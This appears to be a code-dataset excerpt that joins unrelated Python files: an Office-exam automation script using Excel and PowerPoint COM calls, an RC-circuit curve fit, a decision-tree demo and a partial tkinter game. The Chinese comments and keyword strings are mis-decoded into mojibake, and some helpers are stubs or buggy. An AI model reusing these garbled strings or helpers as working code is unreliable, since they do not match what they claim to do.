self.xlBook = self.xlApp.Workbooks.Add()
self.filename = ''
def save(self, newfilename=None): #ไฟๅญๆไปถ
if newfilename:
self.filename = newfilename
self.xlBook.SaveAs(newfilename)
else:
self.xlBook.Save()
def close(self): #ๅ
ณ้ญๆไปถ
self.xlBook.Close(SaveChanges=0)
del self.xlApp
def getCell(self, sheet, row, col): #่ทๅๅๅ
ๆ ผ็ๆฐๆฎ
"Get value of one cell"
sht = self.xlBook.Worksheets(sheet)
return sht.Cells(row, col).Value
def setCell(self, sheet, row, col, value): #่ฎพ็ฝฎๅๅ
ๆ ผ็ๆฐๆฎ
"set value of one cell"
sht = self.xlBook.Worksheets(sheet)
sht.Cells(row, col).Value = value
def setCellformat(self, sheet, row, col): #่ฎพ็ฝฎๅๅ
ๆ ผ็ๆฐๆฎ
"set value of one cell"
sht = self.xlBook.Worksheets(sheet)
sht.Cells(row, col).Font.Size = 15#ๅญไฝๅคงๅฐ
sht.Cells(row, col).Font.Bold = True#ๆฏๅฆ้ปไฝ
sht.Cells(row, col).Font.Name = "Arial"#ๅญไฝ็ฑปๅ
sht.Cells(row, col).Interior.ColorIndex = 3#่กจๆ ผ่ๆฏ
#sht.Range("A1").Borders.LineStyle = xlDouble
sht.Cells(row, col).BorderAround(1,4)#่กจๆ ผ่พนๆก
sht.Rows(3).RowHeight = 30#่ก้ซ
sht.Cells(row, col).HorizontalAlignment = -4131 #ๆฐดๅนณๅฑ
ไธญxlCenter
sht.Cells(row, col).VerticalAlignment = -4160 #
def rowHeightOper(self,sheet,row,height):
sht = self.xlBook.Worksheets(sheet)
sht.Rows(row).RowHeight = height
def deleteRow(self, sheet, row):
sht = self.xlBook.Worksheets(sheet)
sht.Rows(row).Delete()#ๅ ้ค่ก
sht.Columns(row).Delete()#ๅ ้คๅ
def getRange(self, sheet, row1, col1, row2, col2): #่ทๅพไธๅๅบๅ็ๆฐๆฎ๏ผ่ฟๅไธบไธไธชไบ็ปดๅ
็ป
"return a 2d array (i.e. tuple of tuples)"
sht = self.xlBook.Worksheets(sheet)
return sht.Range(sht.Cells(row1, col1), sht.Cells(row2, col2)).Value
def addPicture(self, sheet, pictureName, Left, Top, Width, Height): #ๆๅ
ฅๅพ็
"Insert a picture in sheet"
sht = self.xlBook.Worksheets(sheet)
sht.Shapes.AddPicture(pictureName, 1, 1, Left, Top, Width, Height)
def cpSheet(self, before): #ๅคๅถๅทฅไฝ่กจ
"copy sheet"
shts = self.xlBook.Worksheets
shts(1).Copy(None,shts(1))
def judgeRowHeight(self,OperStr):#่ก้ซๆไฝ
print('ๆญฃๅจๅฎๆ่ฆๆฑ',OperStr)
def judgeColWidth(self,OperStr):
print('ๆญฃๅจๅฎๆ่ฆๆฑ',OperStr)
def judgeFormula(self,OperStr):
print('ๆญฃๅจๅฎๆ่ฆๆฑ',OperStr)
def judgeFunction(self,OperStr):
print('ๆญฃๅจๅฎๆ่ฆๆฑ',OperStr)
def judgeSort(self,OperStr):
print('ๆญฃๅจๅฎๆ่ฆๆฑ',OperStr)
def judgeChart(self,OperStr):
print('ๆญฃๅจๅฎๆ่ฆๆฑ',OperStr)
def judgeBoxLine(self,OperStr):
print('ๆญฃๅจๅฎๆ่ฆๆฑ',OperStr)
def judgeOperFromStr(self,OperStr):#ๆ นๆฎๅฐ้ขๆๆฌ้ๆฉๅฏนๅบ็ๆไฝ
if OperStr.find("่ก้ซ") !=-1:
print("่ฟๅ
ฅ่ก้ซๆไฝ")
self.judgeRowHeight(OperStr)
print("็ปๆ่ก้ซๆไฝ")
if OperStr.find("ๅๅฎฝ") !=-1:
print("่ฟๅ
ฅๅๅฎฝๆไฝ")
self.judgeColWidth(OperStr)
print("็ปๆๅๅฎฝๆไฝ")
if OperStr.find("ๅ
ฌๅผ") !=-1:
print("่ฟๅ
ฅๅ
ฌๅผๆไฝ")
self.judgeFormula(OperStr)
print("็ปๆๅ
ฌๅผๆไฝ")
if OperStr.find("ๅฝๆฐ") !=-1:
print("่ฟๅ
ฅๅฝๆฐๆไฝ")
self.judgeFunction(OperStr)
print("็ปๆๅฝๆฐๆไฝ")
if OperStr.find("ๆๆๆก็บฟ") !=-1:
print("่ฟๅ
ฅๆๆๆก็บฟๆไฝ")
self.judgeBoxLine(OperStr)
print("็ปๆๆๆๆก็บฟๆไฝ")
if OperStr.find("ๆๅบ") !=-1:
print("่ฟๅ
ฅๆๅบๆไฝ")
self.judgeSort(OperStr)
print("็ปๆๆๅบๆไฝ")
if OperStr.find("ๅพ่กจ") !=-1:
print("่ฟๅ
ฅๅพ่กจๆไฝ")
self.judgeChart(OperStr)
print("็ปๆๅพ่กจๆไฝ")
pass
'''
PPTๆไฝ้จๅ่ฏดๆ๏ผ
1.ๅจ็ปๆๆ
2.ๅๆขๆๆ
3.่ถ
็บง้พๆฅ
4.่ๆฏ
5.ๆๅ
ฅ๏ผๅพ็๏ผๅฃฐ้ณ๏ผ่ง้ข
่่ฏๆ ทไพ๏ผ
1.ๅจ็ฌฌๅๅผ ๅนป็ฏ็็ไธๆนๆๅ
ฅๆจชๆๆๆฌๆก๏ผๅจๆๆฌๆกไธญ่พๅ
ฅโๅๆ้ฅผโ๏ผๅญไฝ้ปไฝ๏ผๅญๅท32ใ
2.ๅฐ็ฌฌไธๅผ ๅนป็ฏ็็่ๆฏๅกซๅ
ๆๆ่ฎพ็ฝฎไธบ็บน็ๅกซๅ
๏ผ็บน็ไธบโ้ฑผ็ฑปๅ็ณโใ
3.่ฎพ็ฝฎ็ฌฌไธๅผ ๅนป็ฏ็็ๅๆขๆๆไธบโๆจ่ฟโ๏ผๅฃฐ้ณไธบโ้ผๆโใ
4.็ป็ฌฌๅๅผ ๅนป็ฏ็ๅณไพง็ๅพ็่ฎพ็ฝฎ่ฟๅ
ฅไธญ็โๅ่ฃโๅจ็ปๆๆ๏ผๆๆ้้กนไธบโไธญๅคฎๅไธไธๅฑๅผโใ
5.็ป็ฌฌไธๅผ ๅนป็ฏ็ไธญ็ๆๅญโ่ตๆก่ฑโๆทปๅ ่ถ
้พๆฅ๏ผไฝฟๅ
ถ้พๆฅๅฐ็ฌฌไบๅผ ๅนป็ฏ็ใ
'''
class PptOperation:
def __init__(self):
pass
def AnimationOper(self):
pass
def SwitchOper(self):
pass
def InsertOper(self,style):
pass
def BackgroundOper(self):
pass
def HyperlinkOper(self):
pass
def judgeAnimation(self,OperStr):
print('ๆญฃๅจๅฎๆ่ฆๆฑ',OperStr)
pattern = re.compile('โ(.*)โ')
print (pattern.findall(OperStr))
strFile=str(pattern.findall(OperStr))
file1=strFile.split("โ")
source=file1[0][2:]#่ทๅพๆบๆไปถ
print(source)
file2=strFile.split("โ")
dest=file2[1][0:-2]#่ทๅพ็ฎๆ ๆไปถ
print(dest)
def judgeSwitch(self,OperStr):
print('ๆญฃๅจๅฎๆ่ฆๆฑ',OperStr)
pattern = re.compile('โ(.*)โ')
print (pattern.findall(OperStr))
strFile=str(pattern.findall(OperStr))
file1=strFile.split("โ")
source=file1[0][2:]#่ทๅพๆบๆไปถ
print(source)
file2=strFile.split("โ")
dest=file2[1][0:-2]#่ทๅพ็ฎๆ ๆไปถ
print(dest)
def judgeInsert(self,OperStr):
print('ๆญฃๅจๅฎๆ่ฆๆฑ',OperStr)
def judgeBackground(self,OperStr):
print('ๆญฃๅจๅฎๆ่ฆๆฑ',OperStr)
def judgeHyperlink(self,OperStr):
print('ๆญฃๅจๅฎๆ่ฆๆฑ',OperStr)
def judgeOperFromStr(self,OperStr):#ๆ นๆฎๅฐ้ขๆๆฌ้ๆฉๅฏนๅบ็ๆไฝ
if OperStr.find("ๅจ็ป") !=-1:
print("่ฟๅ
ฅๅจ็ปๆไฝ")
self.judgeAnimation(OperStr)
print("็ปๆๅจ็ปๆไฝ")
if OperStr.find("ๅๆข") !=-1:
print("่ฟๅ
ฅๅๆขๆไฝ")
self.judgeSwitch(OperStr)
print("็ปๆๅๆขๆไฝ")
if OperStr.find("่ถ
็บง้พๆฅ") !=-1:
print("่ฟๅ
ฅ่ถ
็บง้พๆฅๆไฝ")
self.judgeHyperlink(OperStr)
print("็ปๆ่ถ
็บง้พๆฅๆไฝ")
if OperStr.find("่ๆฏ") !=-1:
print("่ฟๅ
ฅ่ๆฏๆไฝ")
self.judgeBackground(OperStr)
print("็ปๆ่ๆฏๆไฝ")
if OperStr.find("ๆๅ
ฅ") !=-1:
print("่ฟๅ
ฅๆๅ
ฅๆไฝ")
self.judgeInsert(OperStr)
print("็ปๆๆๅ
ฅๆไฝ")
'''
Inputๆๅญๅฝๅ
ฅๆไฝ้จๅ่ฏดๆ๏ผ
่่ฏๆณขๅ็ฅ่ฏ็น๏ผ
comๅฏน่ฑก็่ฐ็จๆผ็คบ๏ผ
class InputOperation:
'''
class OperationTypeJudge:
def __init__(self):
pass
def getType(self,OperStr):
if OperStr.find("ๆฟๆข") !=-1 or OperStr.find("้ฆ่ก็ผฉ่ฟ") !=-1:
print('่ฟๆฏword้ข่ฆๆฑ')
print('ๅทฒ่ฝฌword้ขๅค็')
elif OperStr.find("ๅ
ฌๅผ") !=-1 or OperStr.find("ๅฝๆฐ") !=-1:
print('่ฟๆฏexcel้ข่ฆๆฑ')
print('ๅทฒ่ฝฌexcel้ขๅค็')
elif OperStr.find("ๅๆข") !=-1 or OperStr.find("ๅจ็ป") !=-1:
print('่ฟๆฏppt้ข่ฆๆฑ')
print('ๅทฒ่ฝฌppt้ขๅค็')
pass
def getOperaPath(self):
pass
def getOperaFileName(self):
pass
'''
้ๆฉ้ข้จๅ่ฏดๆ๏ผ
'''
class SelectOperation:
def __init__(self):
pass
def getQusetionTxt(self,item):
pass
def getQusetionPic(self,item):
pass
def getAnswer(self,item):
pass
def getCorrectAnswer(self,item):
pass
'''
ๅคๆญ้ข้จๅ่ฏดๆ๏ผ
'''
class JudgeOperation:
def __init__(self):
pass
def getQusetionTxt(self,item):
pass
def getQusetionPic(self,item):
pass
def getAnswer(self,item):
pass
def getCorrectAnswer(self,item):
pass
if __name__ == "__main__":
win=WinOperation()
win.judgeOperFromStr('1ใๅจโ่จ็ฑปๆค็ฉโๆไปถๅคนไธญ๏ผๆฐๅปบไธไธชๅญๆไปถๅคนโ่ๅ่จ็ฑปโใ')
win.judgeOperFromStr('2ใๅฐๆไปถโๆทกๆฐด่ป.dddโ็งปๅจๅฐโ่ป็ฑปๆค็ฉโๆไปถๅคนไธญใ')
win.judgeOperFromStr('3ใ่ฎพ็ฝฎโ่บๆ่ป.aaaโๆไปถๅฑๆงไธบโๅช่ฏปโใ')
win.judgeOperFromStr('4ใๅจๆก้ขไธๅปบ็ซโ็ปฟ่ฒๆค็ฉโ็ๅฟซๆทๆนๅผใ')
word=WordOperation()
word.judgeOperFromStr('1. ๅฐๆ ้ขโๅธๆฉ้พๅฟโ่ฎพ็ฝฎไธบ้ปไฝ๏ผๅฑ
ไธญๅฏน้ฝใ')
word.judgeOperFromStr('2๏ผๅฐๆไธญ็ฌฌไบๆฎต๏ผ่ฟไธชๅฐๅญฆ่ฎพๅจไธๅบงๅบๅ
โฆโฆ๏ผ่ฎพ็ฝฎไธบ้ฆ่ก็ผฉ่ฟ2ๅญ็ฌฆใ')
word.judgeOperFromStr('3๏ผๅฐๆไธญๆๆ็โ็ฐ่ๅธโๆฟๆขไธบโ็ฐๅ
็โใ')
word.judgeOperFromStr('4. ่ฎพ็ฝฎ้กต่พน่ทไธบไธไธๅ2.5ๅ็ฑณ๏ผๅบ็จไบๆด็ฏๆๆกฃ๏ผใ')
word.judgeOperFromStr('5. ๅจๆญฃๆไธ้ข็็ฉบ็ฝๅคๆๅ
ฅ่บๆฏๅญ๏ผๅ
ๅฎนไธบโๅธๆฉ้พๅฟโ๏ผๆ ทๅผไปป้๏ผใ')
excel=ExcelOperation(r'c:/test.xls')
excel.judgeOperFromStr('1.ๅฐA2ๆๅจ่ก็่ก้ซ่ฎพ็ฝฎไธบ30๏ผ40ๅ็ด ๏ผใ')
excel.judgeOperFromStr('2.ๆ นๆฎๅทฅไฝ่กจไธญๆไพ็ๅ
ฌๅผ๏ผ่ฎก็ฎๅ็ญ็บง็โ3D็คพๅขๅไธๆฏไพโ๏ผๅนถๅฐ็ปๆๅกซๅๅจF3:F7ๅๅ
ๆ ผๅ
ใ')
excel.judgeOperFromStr('3.็ปA2:F8ๅๅ
ๆ ผๅบๅๅ ๆๆๆก็บฟใ')
excel.judgeOperFromStr('4.ๆโๆ ไบบๆบ็คพๅขไบบๆฐโ็ฑ้ซๅฐไฝๆๅบใ')
excel.judgeOperFromStr('5.้ๅฎA2:B7ๅๅ
ๆ ผๅบๅ๏ผๅถไฝโไธ็ปดๆ็บฟๅพโ๏ผๅนถๆๅ
ฅๅฐSheet1ๅทฅไฝ่กจไธญใ')
ppt=PptOperation()
ppt.judgeOperFromStr('1.ๅจ็ฌฌๅๅผ ๅนป็ฏ็็ไธๆนๆๅ
ฅๆจชๆๆๆฌๆก๏ผๅจๆๆฌๆกไธญ่พๅ
ฅโๅๆ้ฅผโ๏ผๅญไฝ้ปไฝ๏ผๅญๅท32ใ')
ppt.judgeOperFromStr('2.ๅฐ็ฌฌไธๅผ ๅนป็ฏ็็่ๆฏๅกซๅ
ๆๆ่ฎพ็ฝฎไธบ็บน็ๅกซๅ
๏ผ็บน็ไธบโ้ฑผ็ฑปๅ็ณโใ')
ppt.judgeOperFromStr('3.่ฎพ็ฝฎ็ฌฌไธๅผ ๅนป็ฏ็็ๅๆขๆๆไธบโๆจ่ฟโ๏ผๅฃฐ้ณไธบโ้ผๆโใ')
ppt.judgeOperFromStr('4.็ป็ฌฌๅๅผ ๅนป็ฏ็ๅณไพง็ๅพ็่ฎพ็ฝฎ่ฟๅ
ฅไธญ็โๅ่ฃโๅจ็ปๆๆ๏ผๆๆ้้กนไธบโไธญๅคฎๅไธไธๅฑๅผโใ')
ppt.judgeOperFromStr('5.็ป็ฌฌไธๅผ ๅนป็ฏ็ไธญ็ๆๅญโ่ตๆก่ฑโๆทปๅ ่ถ
้พๆฅ๏ผไฝฟๅ
ถ้พๆฅๅฐ็ฌฌไบๅผ ๅนป็ฏ็ใ')
|
468 | 170d0560c40f3f642f319f6113b68ab8a6bea9ef | import csv
import matplotlib.pyplot as plt
import numpy as np
from scipy.optimize import curve_fit
#funktion
def func(w,rc):
return 1/(np.sqrt(1+w**2*rc**2))
#daten einlesen
with open('data/phase.csv' ) as csvfile:
reader=csv.reader(csvfile, delimiter=',')
header_row=next(reader)
f, U, a, b = [], [], [], []
for row in reader:
f.append(row[0])
U.append(row[1])
a.append(row[2])
b.append(row[3])
f=np.array(f,dtype=float)
U=np.array(U,dtype=float)
a=np.array(a,dtype=float)
b=np.array(b,dtype=float)
#curvefit
U0=0.6
popt, pcov = curve_fit(func, f*2*np.pi, U/U0)
a1=popt[0]
#theoriewerte
R_th=11.01*10**3
C_th=93.3*10**(-9)
#plots
plt.xlabel(r'$f\, / \, Hz$')
plt.ylabel(r'$\frac{U_c}{U_0}$', fontsize=15)
plt.grid()
plt.semilogx(f,U/U0,'rx',label='Messwerte')
x=np.linspace(20,30000,10000)
plt.semilogx(x,func(x*2*np.pi,a1),'b-',label='Ausgleichsrechnung')
plt.semilogx(x,func(x*2*np.pi,R_th*C_th),'g-',label='Theoriekurve')
plt.legend()
plt.savefig('plotb.pdf')
plt.show()
#fehlerausgabe
uncertainties = np.sqrt(np.diag(pcov))
print('RC =',-a1,'+-',uncertainties[0])
print('Theoriewert:',11.01*1000*93.3*10**(-9))
print('Phase:',(a/b)*np.pi*2) |
469 | c9cf65eeec49eba004312491cdd2321200fa6a61 | import cv2
import pandas
from sklearn import tree
import pydotplus
from sklearn.tree import DecisionTreeClassifier
import matplotlib.pyplot as plt
import matplotlib.image as pltimg
df = pandas.read_csv("show.csv")
d = {'UK': 0, 'USA': 1, 'N': 2}
df['Nationality'] = df['Nationality'].map(d)
d = {'YES': 1, 'NO': 0}
df['Go'] = df['Go'].map(d)
######
features = ['Age', 'Experience', 'Rank', 'Nationality']
X = df[features]
y = df['Go']
#####
dtree = DecisionTreeClassifier()
dtree = dtree.fit(X, y)
data = tree.export_graphviz(dtree, out_file=None, feature_names=features)
graph = pydotplus.graph_from_dot_data(data)
graph.write_png('mydecisiontree.png')
img=pltimg.imread('mydecisiontree.png')
imgplot = plt.imshow(img)
plt.show()
print(X)
print(y)
|
470 | c893095be88636e6cb06eb3b939d8106fbb7a8ca | #Arushi Patel (aruship)
from tkinter import *
import random
######################################
#images taken from wikipedia,pixabay,
#trans americas, clipartpanda,pngimg,
#findicons, microsoft word
######################################
####################################
# init
####################################
def init(data):
data.score =0
data.mode = "splashScreen"
data.timerDelay = 100
data.height = 800
data.width = 800
data.speed = 10
data.speedAI = 12
data.speedAI2 = 12
data.switchOnProgress = False
data.r = 25
data.cx= 280
data.cy=750
data.onLeft1, data.onLeft2 = True, True
data.win= False
data.coconuts = []
data.powerUps = []
data.coconuts1 = []
data.coconuts2 = []
data.coconutsAI1 =[]
data.coconutsAI2 = []
data.invincible = []
data.pauseDrops = False
data.pause1Drop = False
data.pause2Drop = False
init1(data)
def init1(data):
data.beInvincible = False
data.Invincible1 = False
data.Invincible2 = False
data.scaryBug = []
data.time = 0
data.coconutFall = False
data.sides = ["r", "l"]
data.level = 1
data.splashScreenTime = 0
data.splashScreenDrops = []
data.background= PhotoImage(file="tree.gif")
data.deadScreen = PhotoImage(file = "deadBug.gif")
data.ladyBug = PhotoImage(file = "lady.gif")
data.winScreen= PhotoImage(file = "treeTop1.gif")
data.winBug = PhotoImage(file = "littleBug.gif")
data.halfBackground = PhotoImage(file = "halfTree.gif")
data.umbrella = PhotoImage(file = "umbrella2.gif")
data.spider = PhotoImage(file = "spider.gif")
data.hourGlass = PhotoImage(file = "hourGlass.gif")
data.splashScreen = PhotoImage(file = "splash.gif")
init2(data)
def init2(data):
data.tbg= PhotoImage(file = "tbg2.gif")
data.click = PhotoImage(file = "click.gif")
data.notClick = PhotoImage(file = "notClick.gif")
data.player1X = 150
data.player1Y = 750
data.player2X = 550
data.player2Y = 750
data.winner = None
data.speed = 12
data.speed2 = 12
data.editorTime = 0
data.editorDrops = []
data.margin = 100
data.enter = False
data.powerUpsEditor = None
data.yourSpeed = None
data.rainSpeed = None
data.slow= data.notClick
data.medium = data.notClick
data.fast = data.notClick
data.drizzle = data.notClick
data.rain =data.notClick
data.thunderstorm = data.notClick
init3(data)
def init3(data):
data.yes = data.notClick
data.no = data.notClick
data.enter = data.notClick
data.levelEditorLives =2
data.rSpeed = None
data.start = None
data.start1 = None
data.start2 = None
data.difficulty = None
data.mode1 = data.notClick
data.mode2 = data.notClick
data.mode3 = data.notClick
data.mode4 = data.notClick
data.mode5 = data.notClick
data.mode6 = data.notClick
data.home = PhotoImage(file = "home.gif")
data.helpScreen = PhotoImage(file = "help1.gif")
data.title = PhotoImage(file = "title.gif")
data.scoreList = []
data.spotList = [270,364,458,552, 646, 740]
data.savedScores = readFile("score.txt")
if data.mode == "levelCreated":
setEverything(data)
initsplashScreenNumbers(data)
def initsplashScreenNumbers(data):
data.splashButtonY = 425
data.p1ButtonX= 225
data.p2ButtonX = 290
data.edButton = 355
data.diffButton = 425
data.helpButton = 490
data.sboardButton = 555
data.hitPenalty = 75
data.splashText = data.height/2-20
data.lives = 2
data.levelMax = 8
data.lane = 94
data.Player1Min= 270
data.Player1Max = 740
data.homeX =50
data.homeY = 650
initScoreBoardHelp(data)
init1Player(data)
def initScoreBoardHelp(data):
data.tbgY=5*data.height/12
data.txtTScore = 150
data.S_P = 220
data.numScores = 5
data.scorePos = data.height/10
data.scoreShift = 270
data.helpY = data.height/2-20
data.name = ""
data.printName = ""
data.hit = False
initAI(data)
def init1Player(data):
data.buffer = 40
def initAI(data):
data.AITY = 225
data.easyX = 200
data.easyY = 300
data.medX =400
data.hardX = 600
data.enterY = 450
data.difS = 4
data.difM = 6
data.difH = 8
data.last = 500
data.enterX = 575
data.PUT = 450
data.RST = 350
data.YST = 250
####################################
# mode dispatcher
####################################
def mousePressed(event, data):
if (data.mode == "splashScreen"): splashScreenMousePressed(event, data)
elif (data.mode == "1Player"): playerMousePressed(event, data)
elif (data.mode == "2Player"): twoPlayerMousePressed(event, data)
elif (data.mode == "editor"): editorMousePressed(event,data)
elif (data.mode == "levelCreated"): levelCreatedMousePressed(event,data)
elif (data.mode == "AI"): AIMousePressed(event, data)
elif (data.mode == "difficulty"): difficultyMousePressed(event, data)
elif (data.mode == "scoreboard"): scoreboardMousePressed(event, data)
elif (data.mode == "help"): helpMousePressed(event, data)
def keyPressed(event, data):
if (data.mode == "splashScreen"): splashKeyPressed(event, data)
elif (data.mode == "1Player"):playerKeyPressed(event, data)
elif (data.mode == "2Player"):twoPlayerKeyPressed(event, data)
elif (data.mode == "editor"): editorKeyPressed(event, data)
elif (data.mode == "levelCreated"): levelCreatedKeyPressed(event,data)
elif (data.mode == "AI"): AIKeyPressed(event, data)
elif (data.mode == "difficulty"): difficultyKeyPressed(event, data)
elif (data.mode == "scoreboard"): scoreboardKeyPressed(event, data)
elif (data.mode == "help"): helpKeyPressed(event, data)
def timerFired(data):
if (data.mode == "splashScreen"): splashScreenTimerFired(data)
elif (data.mode == "1Player"):playerTimerFired(data)
elif (data.mode == "2Player"):twoPlayerTimerFired(data)
elif (data.mode == "editor"): editorTimerFired(data)
elif (data.mode == "levelCreated"): levelCreatedTimerFired(data)
elif (data.mode == "AI"): AITimerFired(data)
elif (data.mode == "difficulty"): difficultyTimerFired(data)
elif (data.mode == "scoreboard"): scoreboardTimerFired(data)
elif (data.mode == "help"): helpTimerFired(data)
def redrawAll(canvas, data):
if (data.mode == "splashScreen"): splashScreenRedrawAll(canvas, data)
elif (data.mode == "1Player"):playerRedrawAll(canvas, data)
elif (data.mode == "2Player"):twoPlayerRedrawAll(canvas, data)
elif (data.mode == "editor"): editorRedrawAll(canvas, data)
elif (data.mode == "levelCreated"): levelCreatedRedrawAll(canvas,data)
elif (data.mode == "AI"): AIRedrawAll(canvas, data)
elif (data.mode == "difficulty"): difficultyRedrawAll(canvas, data)
elif (data.mode == "scoreboard"): scoreboardRedrawAll(canvas, data)
elif (data.mode == "help"): helpRedrawAll(canvas, data)
####################################
# splashScreen mode
####################################
def splashScreenMousePressed(event, data):
#checks for selection of mode
if data.splashButtonY-2*data.r <= event.x <=data.splashButtonY+2*data.r:
if data.p1ButtonX-data.r<=event.y<=data.p1ButtonX+data.r:
data.mode = "1Player"
if data.p2ButtonX-data.r<=event.y<=data.p2ButtonX+data.r:
data.mode = "2Player"
if data.edButton-data.r<=event.y<=data.edButton+data.r:
data.mode = "editor"
if data.diffButton-data.r<=event.y<=data.diffButton+data.r:
data.mode = "difficulty"
if data.helpButton-data.r<=event.y<=data.helpButton+data.r:
data.mode = "help"
if data.sboardButton-data.r<=event.y<=data.sboardButton+data.r:
data.mode = "scoreboard"
def splashKeyPressed(event, data):
pass
def splashScreenTimerFired(data):
data.splashScreenTime += 1
if data.splashScreenTime %2 ==1:
rainDropSplash(data)
for drop in data.splashScreenDrops:
drop.onTimerFired(data)
def splashScreenButtons(canvas, data):
canvas.create_image(data.splashButtonY,data.p1ButtonX,image = data.mode1)
canvas.create_image(data.splashButtonY,data.p2ButtonX,image = data.mode2)
canvas.create_image(data.splashButtonY,data.edButton,image = data.mode3)
canvas.create_image(data.splashButtonY,data.diffButton,image = data.mode4)
canvas.create_image(data.splashButtonY,data.helpButton,image = data.mode5)
canvas.create_image(data.splashButtonY,data.sboardButton,image =data.mode6)
def rainDropSplash(data):
xPosition = random.randint(0,800)
data.splashScreenDrops.append(Coconuts(xPosition,0))
def splashScreenRedrawAll(canvas, data):
canvas.create_image(data.width/2, data.splashText-10, image=data.title)
for drop in data.splashScreenDrops: drop.draw(canvas)
canvas.create_text(data.width/2, data.splashText, text="""
1.) Single Player Level Mode
2.) Two-Player Mode
3.) Level Creator Practice Mode
4.) Play Against the Computer
5.) Help and Instructions
6.) Scoreboard
""", font="Arial 14 bold", fill = "yellow")
splashScreenButtons(canvas, data)
####################################
# taken from class notes
####################################
def writeFile(path, contents):
with open(path, "wt") as f:
f.write(contents)
def readFile(path):
with open(path, "rt") as f:
return f.read()
####################################
# 1Player mode
####################################
#Coconuts (from Mario game) represent the water drops
class Coconuts(object):
def __init__(self,x,y):
self.x = x
self.y = y
self.r = 9
self.fill = "deep sky blue"
self.speed = 30
self.outline= "blue"
def draw(self, canvas):
canvas.create_polygon(self.x,self.y- 2*self.r,
self.x-self.r, self.y,
self.x, self.y + self.r,
self.x+self.r, self.y, fill = self.fill,
outline = self.outline, width = 3)
def onTimerFired(self, data):
# downward falling motion
self.y += self.speed
def hit(data):
#checks for hitting rain
for coconut in data.coconuts:
if data.mode == "1Player" or data.mode == "levelCreated":
if coconut.y>=data.cy-data.r and coconut.y<=data.cy+data.r:
if coconut.x>=data.cx-data.r and coconut.x<=data.cx+data.r:
data.cy+=data.hitPenalty
if data.mode == "levelCreated":
data.lives-=1
elif data.hit ==False and data.level<data.levelMax:
data.score -=data.level
data.coconuts.remove(coconut)
if data.mode == "levelCreated":
data.levelEditorLives-=1
def hit2Player(data):
if data.mode == "2Player":
if data.Invincible1 == False:
#only when powerup isn't active
for coconut in data.coconuts1:
if coconut.y>=data.player1Y-data.r \
and coconut.y<=data.player1Y+data.r:
if coconut.x>=data.player1X-data.r and \
coconut.x<=data.player1X+data.r:
data.player1Y+=data.hitPenalty
data.coconuts1.remove(coconut)
if data.Invincible2 == False:
#only when powerup isn't active
for coconut in data.coconuts2:
if coconut.y>=data.player2Y-data.r and \
coconut.y<=data.player2Y+data.r:
if coconut.x>=data.player2X-data.r and \
coconut.x<=data.player2X+data.r:
data.player2Y+=data.hitPenalty
data.coconuts2.remove(coconut)
class PowerUps(Coconuts):
def __init__(self,x,y):
super().__init__(x, y)
def draw(self, canvas, data):
canvas.create_image(self.x, self.y, image=data.hourGlass)
def hitPause(data):
# checks if hits hour-glass & pauses with flag
for powerUp in data.powerUps:
if data.mode == "1Player" or data.mode == "levelCreated":
if powerUp.y>=data.cy-data.r and powerUp.y<=data.cy+data.r:
if powerUp.x>=data.cx-data.r and powerUp.x<=data.cx+data.r:
data.pauseDrops = True
data.start = data.cy
data.powerUps.remove(powerUp)
elif data.mode == "2Player" or data.mode == "AI":
if powerUp.y>=data.player1Y-data.r and \
powerUp.y<=data.player1Y+data.r:
if powerUp.x>=data.player1X-data.r and \
powerUp.x<=data.player1X+data.r:
data.pause1Drop = True
data.start1 = data.player1Y
data.powerUps.remove(powerUp)
if powerUp.y>=data.player2Y-data.r and \
powerUp.y<=data.player2Y+data.r:
if powerUp.x>=data.player2X-data.r and \
powerUp.x<=data.player2X+data.r:
data.pause2Drop = True
data.start2 = data.player2Y
data.powerUps.remove(powerUp)
class Invincible(PowerUps):
def __init__(self,x,y):
super().__init__(x, y)
def draw(self, canvas, data):
canvas.create_image(self.x, self.y, image=data.umbrella)
def hitInvincible(data):
#checks if hits umbrella powerup
for powerUp in data.invincible:
if data.mode == "1Player" or data.mode == "levelCreated":
if powerUp.y>=data.cy-data.r and powerUp.y<=data.cy+data.r:
if powerUp.x>=data.cx-data.r and powerUp.x<=data.cx+data.r:
data.beInvincible = True
data.start = data.cy
data.invincible.remove(powerUp)
if data.mode == "2Player" or data.mode == "AI":
#for player1
if powerUp.y>=data.player1Y-data.r and \
powerUp.y<=data.player1Y+data.r:
if powerUp.x>=data.player1X-data.r and \
powerUp.x<=data.player1X+data.r:
data.Invincible1=True
data.start1 = data.player1Y
data.invincible.remove(powerUp)
# for player 2
if powerUp.y>=data.player2Y-data.r and \
powerUp.y<=data.player2Y+data.r:
if powerUp.x>=data.player2X-data.r and \
powerUp.x<=data.player2X+data.r:
data.Invincible2=True
data.start2 = data.player2Y
data.invincible.remove(powerUp)
class ScaryBug(object):
def __init__(self,x,y):
self.x = x
self.y = y
self.speed = 25
def draw(self, canvas, data):
canvas.create_image(self.x, self.y, image=data.spider)
def onTimerFired(self, data):
if data.mode =="2Player" or data.mode == "AI":
self.speed = 35
self.y -= self.speed
if data.mode == "1Player" or data.mode == "levelCreated" and\
data.time %8 ==0:
#makes spider dynamically move
side = random.choice(data.sides)
if side == "l":
if self.x -data.lane >=data.Player1Min:self.x-=data.lane
else: self.x+=data.lane
elif side == "r":
if self.x+data.lane<= data.Player1Max:self.x +=data.lane
else: self.x -=data.lane
def hitScaryBug(data):
# checks for automatic death by spider
for bug in data.scaryBug:
if data.mode == "1Player" or data.mode == "levelCreated":
if bug.y>=data.cy-1.5*data.r and bug.y<=data.cy+1.5*data.r:
if bug.x>=data.cx-1.5*data.r and bug.x<=data.cx+1.5*data.r:
data.hit = True
data.lives = 0
data.levelEditorLives = 0
if data.mode == "2Player" or data.mode == "AI":
if bug.y>=data.player1Y-data.r and bug.y<=data.player1Y+data.r:
if bug.x>=data.player1X-data.r and bug.x<=data.player1X+data.r:
data.winner= "player2"
if bug.y>=data.player2Y-data.r and bug.y<=data.player2Y+data.r:
if bug.x>=data.player2X-data.r and bug.x<=data.player2X+data.r:
data.winner= "player1"
def drawPowerups(canvas, data):
for bug in data.scaryBug:
bug.draw(canvas, data)
for powerUp in data.powerUps:
powerUp.draw(canvas, data)
for powerUp in data.invincible:
powerUp.draw(canvas, data)
def drawHome(canvas, data):
#home button in every screen
canvas.create_image(data.homeX,data.homeY, image= data.home)
def checkHome(event, data):
if data.homeY-data.r<= event.y <= data.homeY +data.r:
if data.homeX-data.r<= event.x<=data.homeX+ data.r:
init(data)
def coconutShot(data):
if data.level >0 and data.pauseDrops == False:
if data.time%int(data.levelMax/data.level) == 0 or data.time%6==0:
#increases drops as level increases
